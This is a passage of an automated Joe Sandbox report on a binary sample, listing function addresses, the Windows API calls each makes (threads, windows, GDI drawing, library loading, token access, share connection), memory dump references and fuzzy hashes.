WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0083E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0083E24D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 7e5f3e220404211285d2110458722b21481532f2d7f9a23a5d34ecf02b9e3785
Instruction ID: 2262c6a9ef162b6185d0b7d42ade6d22d4e335f4ca38869f8d7e2c54c88b18ee
Opcode Fuzzy Hash: 7e5f3e220404211285d2110458722b21481532f2d7f9a23a5d34ecf02b9e3785
Instruction Fuzzy Hash: 7611C476904258BBDB119FA89C09EAF7FADFB86320F044255F924E33D1D7B89D0487A0

Function 007FD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,007FCFF9,00000000,00000004,00000000), ref: 007FD218
GetLastError.KERNEL32 ref: 007FD224
__dosmaperr.LIBCMT ref: 007FD22B
ResumeThread.KERNEL32(00000000), ref: 007FD249

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: f9438cd9ab66916ef050a441c479964a7007a9034963d139d8c8790d90ac6daa
Instruction ID: 1ca9d2233a75bd0dd8a267b452ac5fb4d6bd928b127e70b03804d6f98ad54035
Opcode Fuzzy Hash: f9438cd9ab66916ef050a441c479964a7007a9034963d139d8c8790d90ac6daa
Instruction Fuzzy Hash: 8E01D63640510CBBDB215BA5DC09BBE7A6AFF82331F110219FA25923D0DFB58D01C6E1

Function 007D600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007D604C
GetStockObject.GDI32(00000011), ref: 007D6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 007D606A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: d212082c0cabc34cee6a73d21fe2110482f67bf401e5e0082887d6a546c408eb
Instruction ID: 602d00ce11af304d6f3ac957f1c917d410eaf2c676476216253dd05f0e5004a9
Opcode Fuzzy Hash: d212082c0cabc34cee6a73d21fe2110482f67bf401e5e0082887d6a546c408eb
Instruction Fuzzy Hash: 6A118B72101508BFEF125FA48C44EFABBB9FF093A4F050206FA5492220C77ADC60DBA0

Function 007F3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 007F3B56

Part of subcall function 007F3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 007F3AD2
Part of subcall function 007F3AA3: ___AdjustPointer.LIBCMT ref: 007F3AED

_UnwindNestedFrames.LIBCMT ref: 007F3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 007F3B7C
CallCatchBlock.LIBVCRUNTIME ref: 007F3BA4

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 62ae64ccda0551963fe7d075a4ba836fce59d507fc53f44aace9705b718cd984
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 9801177210014DFBDF125E95CC46EFB3B6AEF88754F044015FE4866221C63AE961ABA0

Function 00803073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007D13C6,00000000,00000000,?,0080301A,007D13C6,00000000,00000000,00000000,?,0080328B,00000006,FlsSetValue), ref: 008030A5
GetLastError.KERNEL32(?,0080301A,007D13C6,00000000,00000000,00000000,?,0080328B,00000006,FlsSetValue,00872290,FlsSetValue,00000000,00000364,?,00802E46), ref: 008030B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0080301A,007D13C6,00000000,00000000,00000000,?,0080328B,00000006,FlsSetValue,00872290,FlsSetValue,00000000), ref: 008030BF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 1964731a7f4da816d4cd53c05c40c9f96ea24405054223f1e3fb4aaee2d3d47b
Instruction ID: b33ed5323d253ebdc96ee5af52bd259152b49090ae17f5f86860685c6d3205a3
Opcode Fuzzy Hash: 1964731a7f4da816d4cd53c05c40c9f96ea24405054223f1e3fb4aaee2d3d47b
Instruction Fuzzy Hash: 19012B32313A26ABCB714B799C449677B9CFF46B61B214620F945E32C0D721D901C6E0

Function 00837464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0083747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00837497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008374AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008374CA

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: eb7eaa7a4eff71300c67d797c5d01cf383969751d300e55d24ba81490c0504f2
Instruction ID: 485e6b684b14830ef413acc79e38a4d120b6ddfe4d680c2c6aac2817cf33810a
Opcode Fuzzy Hash: eb7eaa7a4eff71300c67d797c5d01cf383969751d300e55d24ba81490c0504f2
Instruction Fuzzy Hash: 041179B1209315ABE7308F54EC09BA27BF8FB80B04F108569E696D6191DBB0F944DBA4

Function 0083B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B126

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: b5ad3baed525cb93d4b126547ab71732cef7fc33c56c7875c7ffd76657af92f4
Instruction ID: 1244fbba461f107bc9520996e558057e7f275c6a804e3b271e9b3bef8ff5d928
Opcode Fuzzy Hash: b5ad3baed525cb93d4b126547ab71732cef7fc33c56c7875c7ffd76657af92f4
Instruction Fuzzy Hash: E3115B71C0192DE7CF04AFE4E9686FEBF78FF8A711F114086DA81B6185DB7096508BA1

Function 00832DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00832DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00832DD6
GetCurrentThreadId.KERNEL32 ref: 00832DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00832DE4

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 6a00443b2a12d3008b83661282143fa647b6b120687ba9e81443306cd4784127
Instruction ID: 6358158dccf0bf912deb88bf5583b026e033f2c3b8296966b4c28772a7c476d9
Opcode Fuzzy Hash: 6a00443b2a12d3008b83661282143fa647b6b120687ba9e81443306cd4784127
Instruction Fuzzy Hash: 6FE0EDB15012287ADB202B63DC0DEFB7E6CFF96BA1F411119F606D50909AE58941C6F1

Function 00868863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 007E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007E9693
Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96A2
Part of subcall function 007E9639: BeginPath.GDI32(?), ref: 007E96B9
Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00868887
LineTo.GDI32(?,?,?), ref: 00868894
EndPath.GDI32(?), ref: 008688A4
StrokePath.GDI32(?), ref: 008688B2

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 4cdd14234fbf8ae8020a3316147874b2018ea6e074f8619edd95772aecffe1fe
Instruction ID: 550ab377f6be6abc314e7a68d54c9884139c2b60fe872c64f1d36b43c6f8fa39
Opcode Fuzzy Hash: 4cdd14234fbf8ae8020a3316147874b2018ea6e074f8619edd95772aecffe1fe
Instruction Fuzzy Hash: FBF05E36041658FAEB126F94AC0DFDE3F59BF0A310F458100FA51650E1C7B55511CFE6

Function 007E98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 007E98CC
SetTextColor.GDI32(?,?), ref: 007E98D6
SetBkMode.GDI32(?,00000001), ref: 007E98E9
GetStockObject.GDI32(00000005), ref: 007E98F1

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 8c8689689ffd47efbbd7387e0e4bacc5a9f80d9879859652544928f110fddfa0
Instruction ID: 28330a2e887e8002f0d53350d36840ca8fd3839cb726e8ebaa27448d89e571cb
Opcode Fuzzy Hash: 8c8689689ffd47efbbd7387e0e4bacc5a9f80d9879859652544928f110fddfa0
Instruction Fuzzy Hash: 49E06531244280AADB215B75BC09BE93F10FB12335F049219F7FA940E1C3B146909B11

Function 0083162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00831634
OpenThreadToken.ADVAPI32(00000000,?,?,?,008311D9), ref: 0083163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008311D9), ref: 00831648
OpenProcessToken.ADVAPI32(00000000,?,?,?,008311D9), ref: 0083164F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a425c0f5fb413d50a3ffc3545dedf0f470c1642f74d87d7f0970919c48b50573
Instruction ID: b04ce99bceaf17e644b35d0537c27a80a6481e34e57deca1e26f5c5807369d3f
Opcode Fuzzy Hash: a425c0f5fb413d50a3ffc3545dedf0f470c1642f74d87d7f0970919c48b50573
Instruction Fuzzy Hash: A4E08631601211EBDB201FE19E0DB663B7CFF54B91F154808F685C9080E6B44440C791

Function 0082D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0082D858
GetDC.USER32(00000000), ref: 0082D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0082D882
ReleaseDC.USER32(?), ref: 0082D8A3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 132bbd21652f75d7b17a97c768b3e2ccf2b38f44e63b8be09a2c0a41562a31dc
Instruction ID: a8e9d1b1049e2d5af689cf9c72c37da41134e1138800d635e330d2074dd93301
Opcode Fuzzy Hash: 132bbd21652f75d7b17a97c768b3e2ccf2b38f44e63b8be09a2c0a41562a31dc
Instruction Fuzzy Hash: 3CE01AB5800205EFCB419FA0D90C67DBBB1FB18310F15A419E88AE7250CBB85941AF44

Function 0082D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0082D86C
GetDC.USER32(00000000), ref: 0082D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0082D882
ReleaseDC.USER32(?), ref: 0082D8A3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 6fc9d90746662ba32165cf07b6c12c4045833e7b57f879b4374ec81b0da75209
Instruction ID: 8d0d26d0340bec5e49213b63a968d82e2e9ad013e9c90e12d5babcd265970d9f
Opcode Fuzzy Hash: 6fc9d90746662ba32165cf07b6c12c4045833e7b57f879b4374ec81b0da75209
Instruction Fuzzy Hash: 2EE012B1800200EFCB51AFA0D80C66DBBB1FB18310B15A009E88AE7250CBB85901AF44

Function 00844D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00844ED4

Strings

LPT, xrefs: 00844DFB
*, xrefs: 00844E10

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 156f9f12160e6e0b2f5074743a2bf29ff045bc87458fdd1c5af847f31e22bcf8
Instruction ID: 1fbea1fc4de1de82dad58c2c4391e243b5f0601b1e677a426f84ac3e1e1858f8
Opcode Fuzzy Hash: 156f9f12160e6e0b2f5074743a2bf29ff045bc87458fdd1c5af847f31e22bcf8
Instruction Fuzzy Hash: 98913D75A00208DFDB14DF58C484EA9BBF1FF44318F199099E80A9B362DB75ED85CB91

Function 007FE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 007FE30D

Strings

pow, xrefs: 007FE2E5, 007FE302

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 032876a9a3cb559a398c7a4be763f75e43f772c9c985ea90553b9268447c2bb1
Instruction ID: 29da0ef3a3e692b644e4a6759cc64473a8216a1ffb0e58372e91397433d54d7e
Opcode Fuzzy Hash: 032876a9a3cb559a398c7a4be763f75e43f772c9c985ea90553b9268447c2bb1
Instruction Fuzzy Hash: F5514961E0D20A96DB557B18CD093793BA4FF40B40F3049A8E5D5C23FDEB389CD19A46

Function 007EE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 007EE1B1

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 1a7e104fa02d3af6b537adc74d6fbdbb9025860c16ac6b1da14ec04e93aace27
Instruction ID: b1760946636691419e19036cf95f9ae0e386e41d6e1eae27f68ade25249e9b6f
Opcode Fuzzy Hash: 1a7e104fa02d3af6b537adc74d6fbdbb9025860c16ac6b1da14ec04e93aace27
Instruction Fuzzy Hash: 64513235601296DFDF14DF68D0856BA7BA8FF19310F24845AF991DB2C0DA389D82CBA4

Function 007EF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 007EF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 007EF2BB

Strings

@, xrefs: 007EF2AF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: a8ff4a13042fd90dd59adf2f4ae3d5ce614d8600904124d4abb2c629ec85b57c
Instruction ID: 48e577142d7138ae112c511972f2d5473cbcaa7349f45bec718bd9988df9d129
Opcode Fuzzy Hash: a8ff4a13042fd90dd59adf2f4ae3d5ce614d8600904124d4abb2c629ec85b57c
Instruction Fuzzy Hash: 87512872418745DBD320AF14DC8ABABBBF8FF84300F81885DF1D981295EB748529CB66

Function 00855745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 008557E0
_wcslen.LIBCMT ref: 008557EC

Strings

CALLARGARRAY, xrefs: 008557E6, 008557EB

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 692ad9549e33797bd23465df4526b30c9874d8459e851ad5cac6dc5579c80e41
Instruction ID: 9bcb83f7c7a2b0ad09edbaee49b8e3a1545a1611f7f83d0225defa4ed57b3ed2
Opcode Fuzzy Hash: 692ad9549e33797bd23465df4526b30c9874d8459e851ad5cac6dc5579c80e41
